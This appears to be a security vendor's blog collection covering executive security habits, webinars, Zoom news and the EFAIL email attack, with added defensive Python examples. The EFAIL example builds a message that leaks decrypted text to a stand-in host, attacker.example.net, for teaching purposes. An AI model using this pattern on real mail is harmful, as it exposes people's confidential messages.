Who is putting security at risk? It might be your CXOs…

A new report from MobileIron, “Trouble at the Top,” is eye-popping, although perhaps not surprising to IT professionals. In fact, it might provide very helpful data in making your case for security policies within your organization.

Between February and March 2020, Vanson Bourne interviewed 300 enterprise IT decision-makers and 50 C-level executives in Europe, the UK, and the US regarding their organizations’ mobile security protocols.

C-Suite executives are highly targeted for cybersecurity attacks, including phishing.

Yet “76% of C-level executives admitted to requesting to bypass one or more of their organization’s security protocols” during the last year, per the findings.

In a note of irony for IT professionals, “Almost three in four (72%) IT decision-makers also claimed the C-suite is the most likely to forget or need help with resetting their passwords,” writes ZDNet, quoting from the MobileIron study.

MobileIron’s overall point is that employees need the right tools to be secure and productive at the same time. Or, as we would say, security measures cannot afford to impair usability or people will conjure up a way around them.

There is much more in the study. You can register for the download of MobileIron’s “Trouble at the Top” report here.

-Maureen

Protect Your Data in a Remote Work Environment – ILTA Educational Webinar

Working remotely became a necessity almost overnight. But were firm architectures ready? Two common entry points for system compromise, social engineering and network vulnerabilities, threaten the security of remote working. In this session, Mobile Helix CEO and Chief Architect Seth Hallem will describe these vulnerabilities and propose practical, actionable ways to address these weaknesses using safe browsing, network proxies, authentication, authorization, and DLP. These mitigations apply to both desktop and mobile devices.

This is an ILTA Educational Webinar. It is free to members as well as to non-members as part of ILTA’s COVID-19 content. Non-members may register for a free login.

WATCH THE RECORDED WEBINAR HERE

Outline:

I. Social engineering: Phishing, “watering hole” sites, SIM card swaps

   Mitigations including:

    A. Safe browsing

    B. No SMS

    C. Web filtering via proxying

    D. Data Loss Prevention (DLP): printing, recipient checking, metadata filtering

II. Network vulnerabilities

    Mitigations including:

    A. Layered security

    B. Filter – proxy

    C. Authenticate the source – certificates, IP fencing, DoS defense

    D. Authenticate the user – AD credentials, complex passwords, SSO

    E. Authorize – manage email attachments

III. Example of a secure architecture
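The DLP items in section I.D of the outline (recipient checking, keyword and metadata filtering, and the attachment restriction under II.E) are easy to state and surprisingly easy to get wrong in the details. The following is an added example written for this page, not code from the webinar or from the LINK product: a small outgoing-mail check that flags external recipients, matches keyword patterns against subject and body, refuses attachments filed in a classified workspace, and blanks the author and last-editor properties in a .docx before it leaves. The domain list, keyword patterns, workspace name, and the minimal .docx-shaped package are all constructed for the example; a real deployment would pull policy from the DMS, and the metadata scrub shown here covers only docProps/core.xml, not comments or tracked changes.

```python
import io
import re
import zipfile
from email.utils import getaddresses

# Constructed policy for this example; a real deployment loads it from the
# firm's DMS and DLP configuration rather than hard-coding it.
INTERNAL_DOMAINS = {"firm.example"}
KEYWORD_PATTERNS = [re.compile(p, re.I) for p in (r"\bprivileged\b", r"\battorney[- ]client\b")]
CLASSIFIED_WORKSPACES = {"Matter 0042 (ethical wall)"}
# Office core properties that identify people or carry reviewer notes.
SCRUB_TAGS = ("dc:creator", "cp:lastModifiedBy", "dc:description", "cp:keywords", "cp:category")


def external_recipients(headers):
    """Recipient checking: every To/Cc/Bcc address outside the firm's domains."""
    raw = [v for h in ("To", "Cc", "Bcc") if (v := headers.get(h))]
    addrs = [a for _, a in getaddresses(raw) if a]  # drop the ('', '') a trailing comma yields
    return sorted(a for a in addrs if a.rsplit("@", 1)[-1].lower() not in INTERNAL_DOMAINS)


def keyword_hits(text):
    """Keyword filtering over subject plus body; returns the patterns that matched."""
    return [p.pattern for p in KEYWORD_PATTERNS if p.search(text)]


def docx_member(docx, name):
    """Read one part of a .docx package (a .docx is a zip of XML parts)."""
    return zipfile.ZipFile(io.BytesIO(docx)).read(name)


def docx_property(docx, tag):
    """Value of one core property, or None if the element is absent."""
    m = re.search(rf"<{tag}>([^<]*)</{tag}>", docx_member(docx, "docProps/core.xml").decode("utf-8"))
    return m.group(1) if m else None


def scrub_docx_metadata(docx):
    """Metadata filtering: blank the identifying core properties and rewrite the
    package; every other part is copied unchanged so the document still opens."""
    src = zipfile.ZipFile(io.BytesIO(docx))
    out = io.BytesIO()
    with zipfile.ZipFile(out, "w", zipfile.ZIP_DEFLATED) as dst:
        for item in src.infolist():
            data = src.read(item.filename)
            if item.filename == "docProps/core.xml":
                xml = data.decode("utf-8")
                for tag in SCRUB_TAGS:
                    xml = re.sub(rf"<{tag}>[^<]*</{tag}>", f"<{tag}></{tag}>", xml)
                data = xml.encode("utf-8")
            dst.writestr(item.filename, data)
    return out.getvalue()


def evaluate_outgoing(headers, body, attachments):
    """attachments: list of (filename, workspace, bytes).
    Returns (findings, releasable_attachments); empty findings means the message may go."""
    findings = []
    ext = external_recipients(headers)
    if ext:
        findings.append("external recipients: " + ", ".join(ext))
    for hit in keyword_hits(headers.get("Subject", "") + "\n" + body):
        findings.append(f"keyword match: {hit}")
    releasable = []
    for name, workspace, data in attachments:
        if workspace in CLASSIFIED_WORKSPACES and ext:
            findings.append(f"{name}: files from classified workspace {workspace!r} may not leave the firm")
            continue
        releasable.append((name, scrub_docx_metadata(data) if name.lower().endswith(".docx") else data))
    return findings, releasable


def make_sample_docx():
    """Constructed, minimal .docx-shaped package for the example (not a real Word file)."""
    core = ('<?xml version="1.0" encoding="UTF-8"?>'
            '<cp:coreProperties xmlns:cp="http://schemas.openxmlformats.org/package/2006/metadata/core-properties" '
            'xmlns:dc="http://purl.org/dc/elements/1.1/">'
            "<dc:title>Settlement draft</dc:title><dc:creator>jsmith</dc:creator>"
            "<cp:lastModifiedBy>partner-x</cp:lastModifiedBy>"
            "<dc:description>Do not send to opposing counsel</dc:description>"
            "</cp:coreProperties>")
    buf = io.BytesIO()
    with zipfile.ZipFile(buf, "w") as z:
        z.writestr("[Content_Types].xml", "<Types/>")
        z.writestr("docProps/core.xml", core)
        z.writestr("word/document.xml", "<w:document>...</w:document>")
    return buf.getvalue()


if __name__ == "__main__":
    hdrs = {"To": "Partner <partner@firm.example>", "Cc": "opposing@otherfirm.example",
            "Subject": "Privileged: settlement draft"}
    docx = make_sample_docx()
    found, ok = evaluate_outgoing(hdrs, "See attached.",
                                  [("draft.docx", "Matter 0042 (ethical wall)", docx), ("memo.docx", "General", docx)])
    print("\n".join(found))
    print("releasable:", [n for n, _ in ok], "creator after scrub:", repr(docx_property(ok[0][1], "dc:creator")))
```

Recipient checking deliberately runs on the parsed address list rather than the raw header, so display names such as "Partner <opposing@otherfirm.example>" cannot hide an external domain.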

We welcome you and your questions on June 10th.
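Section II of the outline lists "filter – proxy" and "authenticate the source – certificates, IP fencing, DoS defense" as network-side mitigations. The example below, added for this page and not taken from the webinar or from Mobile Helix's products, shows the part of that logic that is most often done wrong: deciding which address to fence on when requests arrive through a proxy. X-Forwarded-For is attacker-controlled unless the TCP peer is one of your own proxies, and even then only the right-most hop that your proxy appended can be trusted. The address ranges, the proxy range, the failure threshold and the `cert_verified` flag (standing in for the TLS terminator's client-certificate result) are all constructed for the example.

```python
import ipaddress

# Constructed policy for this example: office/VPN egress ranges that may reach
# the firm's proxy, and the load balancers whose X-Forwarded-For we trust.
ALLOWED_SOURCES = [ipaddress.ip_network(n) for n in ("203.0.113.0/24", "2001:db8:10::/48")]
TRUSTED_PROXIES = [ipaddress.ip_network(n) for n in ("10.0.0.0/8",)]
MAX_FAILURES = 5  # crude brute-force / DoS brake per source address


def _in(ip, nets):
    # ip_network.__contains__ returns False for a mismatched IP version, so
    # mixing v4 and v6 entries in the lists is safe.
    return any(ip in n for n in nets)


def effective_client_ip(remote_addr, x_forwarded_for=None):
    """Resolve the address to fence on. The header is honoured only when the
    TCP peer is one of our proxies, and then only the right-most hop that is
    not itself one of our proxies: anything further left was supplied by the
    client and may be forged."""
    peer = ipaddress.ip_address(remote_addr)
    if x_forwarded_for and _in(peer, TRUSTED_PROXIES):
        hops = [h.strip() for h in x_forwarded_for.split(",") if h.strip()]
        for hop in reversed(hops):
            ip = ipaddress.ip_address(hop)  # raises ValueError on garbage
            if not _in(ip, TRUSTED_PROXIES):
                return ip
    return peer


class SourceFence:
    """IP fencing plus a client-certificate requirement plus a failure counter.
    Both a fenced source AND a verified client certificate are required, so a
    phished password on its own is not enough to reach the application."""

    def __init__(self):
        self.failures = {}

    def _fail(self, ip, reason):
        self.failures[ip] = self.failures.get(ip, 0) + 1
        return False, reason

    def admit(self, remote_addr, x_forwarded_for=None, cert_verified=False):
        """Returns (allowed, reason). cert_verified is the TLS terminator's
        verdict on the client certificate, passed in rather than re-checked here."""
        try:
            ip = effective_client_ip(remote_addr, x_forwarded_for)
        except ValueError:
            return False, "malformed address"
        if self.failures.get(ip, 0) >= MAX_FAILURES:
            return False, f"{ip} locked out after repeated failures"
        if not _in(ip, ALLOWED_SOURCES):
            return self._fail(ip, f"{ip} outside fenced ranges")
        if not cert_verified:
            return self._fail(ip, f"{ip} did not present a verified client certificate")
        return True, f"{ip} admitted"


if __name__ == "__main__":
    fence = SourceFence()
    for args in (("203.0.113.7", None, True),
                 ("198.51.100.9", "203.0.113.7", True),          # spoofed XFF from an untrusted peer
                 ("10.1.2.3", "203.0.113.7", True),              # XFF appended by our own proxy
                 ("10.1.2.3", "203.0.113.7, 198.51.100.9", True),  # client-prepended hop is ignored
                 ("203.0.113.7", None, False)):
        print(args, "->", fence.admit(*args))
```

The failure counter is keyed on the resolved address, so a client behind your proxy cannot reset it by changing the forged left-hand hops of the header.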

Write to us at: contact@mobilehelix dot com.

-Maureen

Okta Sees a COVID-19 “Zoom Boom”

If you have an office job, you likely now WFH (work from home). The odds are that you have found yourself on at least a handful of video teleconference calls in the past four weeks. There is no question that video conference services have been the backbone of the information workforce during this month of “stay-at-home”. Teachers, students, courtrooms, and television shows are going live from homes all over America.

In the process of doing research, I happened to find this April 8th post by Hector Aguilar, Okta’s President of Technology, How COVID-19 Is Changing the Way We Work: Zoom Boom + MFA is the Way. Okta is a leader in identity management and Multi-Factor Authentication. Therefore, Okta has a unique and vast window into the usage of cloud services.

We all know anecdotally that Zoom usage has been rocketing. This is the first data that I have seen comparing Zoom to other video conference services.

Percentage Increase in Unique Daily Users of Zoom, Cisco WebEx, and Ring Central from 2/24/2020 to 3/27/2020
Source: Okta

From February 28 to March 27, Cisco’s WebEx and Ring Central’s unique daily users were up about 50%, but Zoom’s were up 200%.

Zoom’s adoption has been nothing short of incredible. From yoga teachers to grandparents, people are thrilled with its ease of use. I have used quite a few of the video conferencing services. Our company tried Zoom over two years ago and never looked back. Both the ease of use and the pricing were a world apart from the other services.

Zoom has had a challenge-laden couple of weeks as the onslaught of users and attention by security analysts have exposed vulnerabilities. Some, such as “Zoom-bombing,” where intruders disrupt a session, can be managed with existing policies. Others are more serious. Zoom is reporting fixes weekly. They report that they have removed the use of the Facebook SDK in their iOS app, which was sending user data to Facebook.

School districts have banned usage of Zoom. There are three class-action lawsuits against Zoom.

Zoom announced yesterday that they have formed a CISO Council and an Advisory Board to look at ways to address Zoom’s security and privacy issues, with CISOs from VMware, HSBC, NTT Data, Netflix, and more participating. In what would appear to be a major coup for Zoom, Alex Stamos, former CSO at Facebook, now at Stanford, tweeted on April 8th that he will join Zoom as an outside advisor.

I’m optimistic that they will resolve most of these issues. Zoom has a lot to gain by doing so.

-Maureen

April 9, 2020

We’re an official NetDocuments ISV Partner!

We’ve been a NetDocuments partner for years. Recently, with Leonard Johnson heading up their partner ecosystem, NetDocuments have formalized their NetDocuments ISV Partner Program. We have used their REST APIs to give NetDocuments users access to their documents and their email in the same encrypted container app, LINK. NetDocuments is committed to the platform approach wherein both Independent Software Vendors and NetDocuments customers can develop solutions for optimizing their workflows using the REST APIs.

It’s easy to review, compare, annotate, file, and email documents all within our LINK app. LINK also offers a managed integration with the Microsoft Office apps for editing on an iPad or smartphone.


ILTA LegalSEC Summit 2019 Redux

We are back from a busier than ever ILTA LegalSEC Summit. People attend LegalSEC to genuinely learn how they can keep their law firms protected. This is no easy feat because cybersecurity is a moving target. While Big Law firms participate, there is great value for small and medium sized firms where there might not be a CISO. The Director of IT or network engineer might be the security department. The two or three days at LegalSEC are packed with information.

This year the well-received keynote by William R. Evanina, Director of the National Counterintelligence and Security Center, was recorded. Another popular session was “Leverage These Free Resources to Up Your Security and Governance Game.” Both of these and several other LegalSEC 2019 sessions can be heard at no cost by ILTA members, here.

Heads up, save the date. Next year’s LegalSEC Summit 2020 will be June 1-3 and the location…San Antonio at the Marriott Riverwalk. If you have visited the Riverwalk you know that this is a fantastic location. Hope to see you there.

Mobile Helix LINK at ILTA LegalSEC Summit 2019, June 3-5

We love LegalSEC!

And we are a sponsor again this year. We will be at Table number one showing LINK’s latest mobile DLP features.

Stop by to say hi and to see a LINK demo. Our LINK app’s encryption, containerization, and authentication provide strong security for your documents and data. Now LINK offers key word and metadata filtering, recipient checking, and restriction on emailing files from classified workspaces.

This year’s keynote speaker is William R. Evanina, Director of the National Counterintelligence and Security Center.

Register here

ILTA LegalSEC Summit 2019 Keynote Speaker William R. Evanina

LegalSEC Summit 2019 is designed for technology professionals at every level who manage security, information governance and data privacy tech projects and initiatives in support of the practice of law. This exciting two-day Summit offers premier learning and a connected networking environment to focus on information security challenges faced by the legal industry.

Is Your Email Vulnerable? Ask the Chinese Military


I’m a current events junkie. I’ll admit it. And I work with law firms. Thus, my favorite podcast? “Stay Tuned with Preet.” Yes, this is Preet Bharara, the former U.S. Attorney for the Southern District of New York. Check out an episode. Preet takes a few questions about the law at the beginning of each episode. Then he has a guest. Preet is not only smart, but surprisingly personable. It’s a fast-moving hour.

A recent guest was John P. Carlin, former Assistant Attorney General for the National Security Division at the Department of Justice and Chief of Staff to Robert Mueller at the FBI. He is currently a partner with Morrison & Foerster. Carlin is an international cybersecurity expert.

One of the things which caught my attention in this episode was Carlin’s story of the US subsidiary of a German company whose data was stolen by hackers in the Chinese military. The company, SolarWorld, in Hillsboro, Oregon, made solar energy components.

How was the data stolen? Email. Carlin said, “Email. It is the least protected part of the system, usually. Not like Intellectual Property which is encrypted or where special measures are taken to protect it. They stole email traffic.”


ILTA Webinar: Mobile, Secure NetDocuments Workflows: NetDocuments® DMS + LINK Encrypted App

Do you use NetDocuments® DMS today or are you evaluating NetDocuments? If you are looking for an encrypted container app approach for mobile NetDocuments DMS, our LINK app may provide that extra client-side security that you are looking for.

Date and time: Monday, February 11, 2019, Noon EST

Watch a recording of the demo here


Our CEO in CSO: Ripped from the headlines – are your messages secure in these encrypted apps?

In the investigations of Paul Manafort and Michael Cohen, the FBI has retrieved messages from Signal, Telegram and WhatsApp. While there are weaknesses inherent in all of these apps, the question remains: What does a good data protection scheme look like?


A few days ago, the FBI revealed that Michael Cohen’s messages sent with Signal and WhatsApp are now available as evidence in the on-going investigation into his various dealings. While thousands of emails and documents have already been recovered from Cohen’s devices, home, hotel room, and office, the recovery of data from messaging apps that promise end-to-end encryption is surprising. One would presume that end-to-end message encryption should ensure that those messages are unrecoverable without assistance from Mr. Cohen. However, clearly that is not the case.


Secure Email is Cracked; What Now?


By Seth Hallem, Mobile Helix CEO, Co-founder, & Chief Architect

Secure email using S/MIME and OpenPGP is fundamentally broken. Our CEO explains the EFAIL vulnerability and why our LINK Email is not susceptible to EFAIL. What do we do next to protect email? 

On Sunday night, a team of researchers from Germany and Belgium dropped a major bomb on the world of encrypted email by describing a simple, widely applicable, and wildly effective technique for coercing email clients into releasing encrypted email contents through “exfiltration channels.”[1] The concept is simple: by combining known manipulation techniques against the encryption modes specified in the S/MIME and OpenPGP standards with lax security choices in a wide variety of email clients, the research team was able to intercept and manipulate encrypted emails such that large blocks of the plaintext are revealed to a malicious server.

What is most brilliant (and most dangerous) about this attack is that it does not require decrypting the email messages or stealing encryption keys. Hence, the attack can be deployed as a man-in-the-middle attack on the infrastructure of the internet itself, rather than requiring that a specific email server or email client be compromised.

The essential idea behind this attack is simple: HTML emails give the client a variety of reasons to query remote servers to load parts of those emails. The simplest (and most common) example is displaying embedded images. Many marketing emails use tiny embedded images to monitor who has opened an email. This technique is so pervasive that many of us have become desensitized to clicking the “Allow images from this sender” prompt in Outlook. It is common practice for marketing emails to contain embedded images with essential content, which encourages users to allow the client to load all images in that message. However, doing so loads both the visible images and the tiny, single-pixel images that marketing tools use to determine that we have opened the email message in question.
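To make the remote-load channel concrete, here is an added example written for this page; it is not code from the EFAIL researchers or from Mobile Helix. It reproduces the simplest of the “direct exfiltration” message shapes described in the EFAIL paper: the attacker, holding only a captured ciphertext, wraps it in two cleartext HTML parts that open and close an img tag. A lax client decrypts the middle part, concatenates all three into one HTML document, and fetches the resulting image URL, which now contains the plaintext. A hardened client renders each MIME part in isolation (so the attacker's tag never forms), blocks remote loads outright, and flags the mix of encrypted and cleartext bodies. The S/MIME layer is replaced by a base64 stand-in purely so the example runs offline with no keys; the boundary, addresses, host name and secret are all constructed.

```python
import base64
import re
from email import message_from_string, policy

ENCRYPTED_TYPE = "application/pkcs7-mime"
BOUNDARY = "efail-demo"  # constructed


# Stand-in for the S/MIME or OpenPGP layer. Base64 is used ONLY so the example
# runs without keys; it is not encryption and provides no secrecy. The attacker
# never calls stand_in_decrypt: the victim's client does the decrypting.
def stand_in_encrypt(plaintext):
    return base64.b64encode(plaintext.encode()).decode()


def stand_in_decrypt(ciphertext):
    return base64.b64decode(ciphertext).decode()


def build_message(parts):
    """Assemble a multipart/mixed message from (content-type, body) pairs."""
    lines = ["From: sender@example.org", "To: victim@example.com", "Subject: Re: draft",
             "MIME-Version: 1.0", f'Content-Type: multipart/mixed; boundary="{BOUNDARY}"', ""]
    for ctype, body in parts:
        lines += [f"--{BOUNDARY}", f"Content-Type: {ctype}", "", body]
    lines.append(f"--{BOUNDARY}--")
    return "\n".join(lines) + "\n"


def wrap_for_exfiltration(captured_ciphertext):
    """The EFAIL direct-exfiltration shape: the ciphertext is sandwiched between
    an unclosed <img src=" and the closing "> so that, once the victim's client
    decrypts and concatenates, the plaintext IS the image URL."""
    return build_message([
        ("text/html", '<img src="http://attacker.example.net/'),
        (f"{ENCRYPTED_TYPE}; smime-type=enveloped-data", captured_ciphertext),
        ("text/html", '">'),
    ])


def _decrypted_parts(raw):
    """Yield (was_encrypted, body) for each leaf part, decrypting where needed."""
    msg = message_from_string(raw, policy=policy.default)
    for part in msg.iter_parts():
        body = part.get_payload(decode=True).decode()
        encrypted = part.get_content_type() == ENCRYPTED_TYPE
        yield encrypted, (stand_in_decrypt(body) if encrypted else body)


def remote_image_urls(html):
    return re.findall(r'<img\s[^>]*?src="([^"]*)"', html)


def lax_client(raw):
    """A lax client: concatenates every part into one HTML document and fetches
    every remote image. Returns the URLs it would request (a real client would
    percent-encode the path; the plaintext leaves either way)."""
    html = "".join(body for _, body in _decrypted_parts(raw))
    return remote_image_urls(html)


def hardened_client(raw):
    """Each part is rendered as its own document, so cleartext parts cannot
    contribute markup to an encrypted one; remote loads are refused; and a
    message mixing encrypted and cleartext bodies is flagged for the user."""
    parts = list(_decrypted_parts(raw))
    blocked = [u for _, body in parts for u in remote_image_urls(body)]
    mixed = any(enc for enc, _ in parts) and any(not enc for enc, _ in parts)
    return {"fetched": [], "blocked": blocked, "mixed_content": mixed,
            "rendered": [body for _, body in parts]}


if __name__ == "__main__":
    secret = "<p>Secret: the merger closes on Friday.</p>"
    attack = wrap_for_exfiltration(stand_in_encrypt(secret))
    print("lax client fetches:", lax_client(attack))
    print("hardened client:", hardened_client(attack))
```

Note what the hardened client's `blocked` list shows for the attack message: rendered in isolation, neither cleartext fragment contains a complete img tag, so there is nothing to fetch even before the remote-load block applies. The `mixed_content` flag is the user-visible signal that someone has tampered with the message structure.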
